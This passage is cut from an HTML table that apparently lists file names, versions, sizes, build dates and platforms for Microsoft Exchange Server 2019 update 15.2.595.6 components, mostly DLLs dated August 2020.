2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.partner.dll</td><td>15.2.595.6</td><td>37,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.federateddirectory.dll</td><td>15.2.595.6</td><td>146,312</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.ffosynclogmsg.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.dll</td><td>15.2.595.6</td><td>594,824</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.frontendhttpproxy.eventlogs.dll</td><td>15.2.595.6</td><td>14,720</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.frontendtransport.monitoring.dll</td><td>15.2.595.6</td><td>30,080</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.griffin.variantconfiguration.dll</td><td>15.2.595.6</td><td>99,720</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>15.2.595.6</td><td>42,376</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>15.2.595.6</td><td>40,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.addressfinder.dll</td><td>15.2.595.6</td><td>54,144</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.common.dll</td><td>15.2.595.6</td><td>164,224</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.diagnostics.dll</td><td>15.2.595.6</td><td>58,752</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.flighting.dll</td><td>15.2.595.6</td><td>204,168</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.passivemonitor.dll</td><td>15.2.595.6</td><td>17,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.proxyassistant.dll</td><td>15.2.595.6</td><td>30,600</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routerefresher.dll</td><td>15.2.595.6</td><td>38,776</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routeselector.dll</td><td>15.2.595.6</td><td>48,520</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpproxy.routing.dll</td><td>15.2.595.6</td><td>180,608</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.httpredirectmodules.dll</td><td>15.2.595.6</td><td>36,736</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.httputilities.dll</td><td>15.2.595.6</td><td>25,992</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.data.dll</td><td>15.2.595.6</td><td>1,868,160</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.diagnosisutil.dll</td><td>15.2.595.6</td><td>54,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.hygiene.eopinstantprovisioning.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.idserialization.dll</td><td>15.2.595.6</td><td>35,712</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll.fe</td><td>15.2.595.6</td><td>18,312</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>15.2.595.6</td><td>263,040</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.exe.fe</td><td>15.2.595.6</td><td>263,040</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>15.2.595.6</td><td>24,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe.fe</td><td>15.2.595.6</td><td>24,968</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.imapconfiguration.dl1</td><td>15.2.595.6</td><td>53,128</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.inference.common.dll</td><td>15.2.595.6</td><td>216,960</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.hashtagsrelevance.dll</td><td>15.2.595.6</td><td>32,128</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.inference.peoplerelevance.dll</td><td>15.2.595.6</td><td>281,984</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.ranking.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.safetylibrary.dll</td><td>15.2.595.6</td><td>83,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.inference.service.eventlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>15.2.595.6</td><td>94,088</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>15.2.595.6</td><td>1,840,008</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>15.2.595.6</td><td>71,560</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>15.2.595.6</td><td>175,488</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>15.2.595.6</td><td>45,960</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>15.2.595.6</td><td>159,616</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>15.2.595.6</td><td>51,072</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>15.2.595.6</td><td>45,952</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.databasemanager.dll</td><td>15.2.595.6</td><td>32,136</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>15.2.595.6</td><td>100,224</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueue.eventlog.dll</td><td>15.2.595.6</td><td>13,184</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.jobqueueservicelet.dll</td><td>15.2.595.6</td><td>271,224</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitch.dll</td><td>15.2.595.6</td><td>22,392</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.killswitchconfiguration.dll</td><td>15.2.595.6</td><td>33,672</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.auditing.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.certificatelog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll</td><td>15.2.595.6</td><td>27,520</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.easlog.dll</td><td>15.2.595.6</td><td>30,600</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ecplog.dll</td><td>15.2.595.6</td><td>22,408</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.eventlog.dll</td><td>15.2.595.6</td><td>66,440</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.ewslog.dll</td><td>15.2.595.6</td><td>29,576</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll</td><td>15.2.595.6</td><td>19,848</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.groupescalationlog.dll</td><td>15.2.595.6</td><td>20,360</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.httpproxylog.dll</td><td>15.2.595.6</td><td>19,336</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.hxservicelog.dll</td><td>15.2.595.6</td><td>34,176</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.iislog.dll</td><td>15.2.595.6</td><td>103,808</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.lameventlog.dll</td><td>15.2.595.6</td><td>31,624</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.migrationlog.dll</td><td>15.2.595.6</td><td>15,744</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll</td><td>15.2.595.6</td><td>20,872</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.oauthcafelog.dll</td><td>15.2.595.6</td><td>16,256</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.outlookservicelog.dll</td><td>15.2.595.6</td><td>49,032</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owaclientlog.dll</td><td>15.2.595.6</td><td>44,424</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.owalog.dll</td><td>15.2.595.6</td><td>38,280</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.perflog.dll</td><td>15.2.595.6</td><td>10,375,048</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.pfassistantlog.dll</td><td>15.2.595.6</td><td>29,064</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.rca.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.restlog.dll</td><td>15.2.595.6</td><td>24,456</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.store.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll</td><td>15.2.595.6</td><td>21,896</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.core.dll</td><td>15.2.595.6</td><td>89,472</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.auditing.dll</td><td>15.2.595.6</td><td>20,864</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.certificatelog.dll</td><td>15.2.595.6</td><td>26,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.cmdletinfralog.dll</td><td>15.2.595.6</td><td>21,376</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.common.dll</td><td>15.2.595.6</td><td>28,032</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.easlog.dll</td><td>15.2.595.6</td><td>28,544</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.errordetection.dll</td><td>15.2.595.6</td><td>36,224</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.ewslog.dll</td><td>15.2.595.6</td><td>16,768</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.griffinperfcounter.dll</td><td>15.2.595.6</td><td>19,848</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.groupescalationlog.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.httpproxylog.dll</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.hxservicelog.dll</td><td>15.2.595.6</td><td>19,840</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.iislog.dll</td><td>15.2.595.6</td><td>57,216</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.migrationlog.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oabdownloadlog.dll</td><td>15.2.595.6</td><td>18,824</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.oauthcafelog.dll</td><td>15.2.595.6</td><td>16,256</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.outlookservicelog.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owaclientlog.dll</td><td>15.2.595.6</td><td>15,240</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.595.6</td><td>15,232</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.595.6</td><td>52,608</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll</td><td>15.2.595.6</td><td>34,176</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.595.6</td><td>17,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.595.6</td><td>43,392</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.595.6</td><td>165,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.595.6</td><td>54,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.595.6</td><td>9,055,608</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.595.6</td><td>33,152</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.595.6</td><td>124,296</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.595.6</td><td>82,824</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.595.6</td><td>14,208</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.595.6</td><td>30,088</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.595.6</td><td>661,376</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.595.6</td><td>63,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.595.6</td><td>175,496</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.595.6</td><td>2,791,808</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.595.6</td><td>53,128</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.595.6</td><td>151,944</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.595.6</td><td>966,528</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.595.6</td><td>185,216</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.595.6</td><td>31,616</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.595.6</td><td>39,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.595.6</td><td>105,856</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.595.6</td><td>95,104</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.595.6</td><td>43,400</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.595.6</td><td>18,816</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>15.2.595.6</td><td>172,928</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.595.6</td><td>102,784</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.595.6</td><td>98,696</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.595.6</td><td>188,800</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.595.6</td><td>43,392</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.595.6</td><td>447,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.595.6</td><td>89,976</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.595.6</td><td>107,904</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.595.6</td><td>374,664</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.595.6</td><td>193,928</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.595.6</td><td>552,320</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.595.6</td><td>16,256</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.595.6</td><td>15,752</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.595.6</td><td>321,416</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.595.6</td><td>17,792</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.595.6</td><td>45,440</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.595.6</td><td>18,304</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.595.6</td><td>20,864</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.595.6</td><td>415,104</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.595.6</td><td>1,269,640</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.595.6</td><td>39,296</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.595.6</td><td>433,024</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.595.6</td><td>4,563,336</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.595.6</td><td>261,000</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.595.6</td><td>33,664</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.595.6</td><td>94,080</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.595.6</td><td>586,112</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.595.6</td><td>3,537,288</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.595.6</td><td>67,968</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.595.6</td><td>16,484,232</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.595.6</td><td>58,760</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.595.6</td><td>23,944</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.595.6</td><td>101,760</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.595.6</td><td>543,624</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.595.6</td><td>305,024</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.595.6</td><td>273,800</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.595.6</td><td>418,688</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.595.6</td><td>275,840</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll</td><td>15.2.595.6</td><td>70,528</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.595.6</td><td>7,872,888</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.595.6</td><td>1,501,568</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.595.6</td><td>71,552</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.595.6</td><td>1,238,920</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.595.6</td><td>1,876,360</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.595.6</td><td>5,366,656</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.595.6</td><td>36,224</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.595.6</td><td>117,632</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.595.6</td><td>207,744</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.595.6</td><td>79,752</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.595.6</td><td>17,280</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.595.6</td><td>156,024</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.595.6</td><td>65,920</td><td>12-Aug-2020</td><td>20:44</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>15.2.595.6</td><td>30,600</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td